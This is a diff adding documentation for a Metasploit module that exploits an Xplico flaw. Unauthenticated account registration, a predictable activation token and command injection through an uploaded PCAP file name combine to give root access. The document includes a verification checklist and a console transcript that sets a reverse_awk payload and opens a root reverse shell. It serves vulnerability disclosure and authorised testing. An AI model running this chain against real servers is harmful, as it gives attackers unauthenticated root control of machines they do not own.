Add Xplico Remote Code Execution Module

documentation/modules/exploit/linux/http/xplico_exec.md

@@ -0,0 +1,88 @@
+## Vulnerable Application
+This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user.
+
+The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet 
+traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create
+ a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try
+to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation.
+But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.
+
+One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum
+of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.
+
+**Vulnerable Application Installation Steps**
+
+Follow instruction from "from sourceforge" section at following URL. Don't forget install version 1.2.0 instead of 1.0.0. At the time of this writing, installation commands contains command for version 1.0.0 
+
+[http://wiki.xplico.org/doku.php?id=ubuntu](http://wiki.xplico.org/doku.php?id=ubuntu)
+
+You may also give a try to virtualbox image provided by maintainer of Xplico. I've tested this module against Xplico-1.1.0-ubuntu-13.10-i386.ova.
+[https://sourceforge.net/projects/xplico/files/VirtualBox%20images/](https://sourceforge.net/projects/xplico/files/VirtualBox%20images/)
+
+Username of the virtualbox image is "ubuntu" and password is "reverse".
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/securityonion_xplico_exec`
+- [ ] Set `RHOST`
+- [ ] Set `PAYLOAD cmd/unix/reverse_awk`
+- [ ] Set `LHOST`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `New user successfully registered` in console.
+- [ ] **Verify** that you are seeing `User successfully activated` in console.
+- [ ] **Verify** that you are seeing `Successfully authenticated` in console.
+- [ ] **Verify** that you are seeing `New Case successfully creted` in console.
+- [ ] **Verify** that you are seeing `New Sols successfully creted` in console.
+- [ ] **Verify** that you are seeing `PCAP successfully uploaded. Pcap parser is going to start on server side` in console.
+- [ ] **Verify** that you are getting `We are at PCAP decoding phase. Little bit more patience...` in console.
+- [ ] **Verify** that you have your root shell.
+
+## Scenarios
+
+```
+msf > use exploit/linux/http/securityonion_xplico_exec
+msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30
+RHOST => 12.0.0.30
+msf exploit(securityonion_xplico_exec) > 
+msf exploit(securityonion_xplico_exec) > exploit 
+
+[-] Exploit failed: A payload has not been selected.
+[*] Exploit completed, but no session was created.
+msf exploit(securityonion_xplico_exec) > set payload cmd/unix/
+set payload cmd/unix/generic         set payload cmd/unix/reverse_netcat
+set payload cmd/unix/reverse_awk     
+msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk 
+payload => cmd/unix/reverse_awk
+msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1 
+LHOST => 12.0.0.1
+msf exploit(securityonion_xplico_exec) > exploit 
+
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Initiating new session on server side
+[*] Registering a new user
+[+] New user successfully registered
+[*] Username: mwbvnyowr
+[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT
+[*] Calculating em_key code of the user
+[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e
+[+] User successfully activated
+[*] Authenticating with our activated new user
+[+] Successfully authenticated
+[*] Creating new case
+[+] New Case successfully creted. Our pol_id = 36
+[*] Creating new xplico session for pcap
+[+] New Sols successfully creted. Our sol_id = 54
+[*] Uploading malformed PCAP file
+[+] PCAP successfully uploaded. Pcap parser is going to start on server side.
+[*] Parsing has started. Wait for parser to get the job done...
+[+] We are at PCAP decoding phase. Little bit more patience...
+[+] We are at PCAP decoding phase. Little bit more patience...
+[+] We are at PCAP decoding phase. Little bit more patience...
+[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 +0300
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```